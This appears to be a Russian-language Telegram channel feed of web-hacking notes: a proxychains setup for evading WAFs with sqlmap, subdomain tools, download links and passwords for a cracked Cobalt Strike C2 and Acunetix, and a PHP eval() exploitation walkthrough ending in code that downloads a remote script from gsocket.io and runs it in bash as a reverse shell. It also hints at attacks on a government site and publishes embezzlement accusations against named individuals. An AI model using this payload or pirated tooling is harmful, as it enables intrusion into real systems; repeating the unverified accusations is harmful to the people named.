Web Application Security Notes
562 subscribers
44 photos
1 video
10 files
22 links
For me
Download Telegram
image_2021-04-21_11-13-08.png
10.3 KB
#waf #proxy #config #proxychains
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.

apt install proxychains 
nano /etc/proxychains.conf

random_chain
chain_len = 1
quiet_mode
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 93.177.***.*** 1085
заполняем кучей проксей

После запускаем любой скрипт через proxychains типа
proxychains sqlmap.py
#script #Полезные_Штуки
https://github.com/aboul3la/Sublist3r

Скрипт для поиска поддоменов.

python sublist3r.py -d domain.ru
Cobalt Strike 4.9

Download
: https://ponies.cloud/c2/CobaltStrike%204.9%20Cracked%20uCare@Pwn3rzs.7z
Password: 20231004_2218

Full Black client: https://ponies.cloud/c2/CobaltStrike%204.9%20Client%20Only%20Full%20Theme%20uCare@Pwn3rzs.7z
Password: 20231005_2033
👍1
Acunetix_23.11.rar
256.7 MB
Буду иногда выкладывать тем, чем пользуюсь и писать заметки иногда, а то сохранённые сообщения уже переполнены 😆
MoElDump-master.zip
10.4 KB
Дампер написали уже пару лет назад, но всё равно иногда пользуюсь (под монгодб и эластик)
1
Коменты открыл и привязал чатик 😆. Мой главный вопрос, откуда вы узнали про этот канал?) я его забросил в 2023 году, неужели нужно дальше выкладывать такие штуки?
Знаю, что многие используют окунь немного неправильно, вот одна из причин (возможно кто-то не знал про это)

1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.

2. Кормим этот файл в акунетикс

Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
8👍2
Web Application Security Notes
#script #Полезные_Штуки https://github.com/aboul3la/Sublist3r Скрипт для поиска поддоменов. python sublist3r.py -d domain.ru
https://www.youtube.com/shorts/qn6OGt6GqHQ

В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.

https://github.com/screetsec/Sudomy.git

./sudomy -d domain -dP -eP -rS -cF -pS -tO -gW --httpx  -aI webanalyze -sS
👍52
Быстро работают, оказывается если ломануть правительственный сайт - то лочат сервера...
3
История о том, как я решил пройти собеседование в двух компаниях ПТ и Грибы (facct), специализирующейся на информационной безопасности, приводит меня к размышлениям о процессе найма и работе в области пентестов веб приложений.

Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.

Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.

Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.

Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.

Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
😁3
Но я не участвовал в ботнете 😆
2🔥1🥰1
Если у кого-то есть хостинг серверов, которые не блочат - напишите, нексус отпал 😆
Из интересного:
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
shell.php?cmd=phpinfo();

Далее получаем список доступных функций:
shell.php?cmd=print_r(get_defined_functions());

В данном веб приложении была обнаружена функция "popen", выполняем whoami

shell.php?cmd=$h=popen(%27whoami%27,%27r%27);echo%20fread($h,4096);pclose($h);

Выбираем реверс шелл, в данном случае я использовал gsocket

eval('
$cmd = file_get_contents("http://gsocket.io/y");
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);

$process = proc_open("bash -c \"$cmd\"", $descriptorspec, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo $output;
}
');

Профит (скрины в комменты закину)
4👍4
Написал небольшую статью, по не сильно популярной (на данный момент) технике sql injection.
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.

https://telegra.ph/Voice-Based-SQL-Injection-03-07

P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
👍6
Наш чатик "хацкеров" был заблокирован (непонятно за что, саппорт так и не ответил), поэтому новый открыт, для тех кто потерял "Hiddmond" - заходите https://t.me/hiddmond0
image_2025-03-26_22-10-36.png
77.6 KB
Эм, господа из ФБР, вы могли мне просто на почту или в тг написать... 😆
😁1
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔5
Небольшая статья про Malvertising, всё сказанное выдумано, все совпадения случайны
https://telegra.ph/Malvertising-ili-Kak-zarazit-80-000-ustrojstv-cherez-reklamu-06-09
4👍1🤯1
#Расследование #газпром #Троицк #часть1

Как отмываются миллионы рублей на строительных работах

В течение последних месяцев мною ведётся тщательное изучение деятельности филиала ПАО «ОГК-2» в городе Троицке (Челябинская область). В результате анализа внутренних документов, смет, актов выполненных работ и наглядных фото с объектов, выявлены признаки масштабного хищения бюджетных средств и злоупотреблений служебным положением.

Фигуранты: Селивёрстов, Птичкин и не только
Изначально подозрения вызывали действия двух должностных лиц — Селивёрстова и Птичкина, однако в процессе изучения документов выяснилось, что круг вовлечённых лиц шире. Более того, за время своей работы в Троицке Селивёрстов, по имеющимся сведениям, приобрёл коттедж, автомобиль и получил наличными несколько миллионов рублей. Это особенно подозрительно, учитывая его официальную зарплату.

Схема: завышение стоимости работ в 10 раз и «освоение» средств
Ключевая схема — завышение стоимости строительных и монтажных работ (СМР), а также оборудования в разы выше рыночной. Пример — строительство бетонных укрытий. Согласно расчётам:

Фактическая себестоимость одного укрытия: 350 000 руб.

Стоимость по договору: 3 360 000 руб.

Разница: 3 010 000 руб. с одного укрытия

Всего таких укрытий — 8
→ Общая «дополнительная маржа» составила 24 080 000 руб.

Эти расчёты подтверждаются сметами, актами КС-2 и справками КС-3, подписанными руководством филиала и подрядчиком ООО «НПП "АИМ"».

Подрядчик — аффилированная компания?
Подрядчиком выступает ООО «НПП "АИМ"» (г. Москва), что уже вызывает вопросы: почему московская компания привлекается для несложных бетонных работ в Челябинской области? Признаки аффилированности или фиктивности подрядной схемы налицо.

Документальное подтверждение
В моём распоряжении:

Акты приёмки выполненных работ и справки о стоимости затрат (КС-2 и КС-3);

Сметные документы и сопроводительное письмо от подрядчика;

Фотофакты с территории Троицкой ГРЭС, подтверждающие реальные объёмы и стоимость работ;

Расчётная таблица по фактической себестоимости и завышенным суммам по контракту.

Заключение
Все вышеперечисленные данные свидетельствуют о систематическом отмывании средств через завышенные подрядные работы и фиктивные схемы. Учитывая суммы, речь идёт о многомиллионных хищениях.

Настоящее сообщение — часть готовящегося пакета документов, который в ближайшие месяцы будет направлен в ОБЭП и иные надзорные органы. Надеюсь на всестороннюю проверку и объективную оценку ситуации компетентными органами.
👍3🤯21